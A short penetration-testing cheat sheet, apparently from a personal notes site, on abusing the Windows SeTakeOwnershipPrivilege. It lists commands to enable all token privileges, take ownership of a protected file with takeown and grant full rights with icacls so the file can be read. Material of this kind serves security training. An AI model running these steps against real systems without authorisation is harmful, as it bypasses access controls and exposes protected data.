SeTakeOwnershipPrivilege
SeTakeOwnershipPrivilege is a user rights assignment in Windows that allows a user to take ownership of any object, such as files, directories, or registry keys. This privilege is typically assigned to administrators or system accounts, granting them the ability to change the ownership of objects even if they do not have explicit permissions. It is a powerful privilege often used for system maintenance or recovery tasks. Misuse of this privilege can lead to security risks, as it bypasses standard access control mechanisms.
If SeTakeOwnershipPrivilege is Disabled
- Get EnableAllTokenPrivs.ps1 script.
- Run following commands:
Import-Module .\Enable-Privilege.ps1 ## Import the script in PS
.\EnableAllTokenPrivs.ps1 ## This enables all tokens
whoami /priv ## Verify
Ownership Abuse
# Check Last Write Time, Attributes & Owner for the file
Get-ChildItem -Path 'C:\Hidden\secret.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Directory Ownership
cmd /c dir /q 'C:\Hidden'
# Take Ownership of the file
takeown /f 'C:\Hidden\secret.txt'
# We have to again grand ourself full ACL in order to view it
icacls 'C:\Hidden\secret.txt' /grant rezydev:F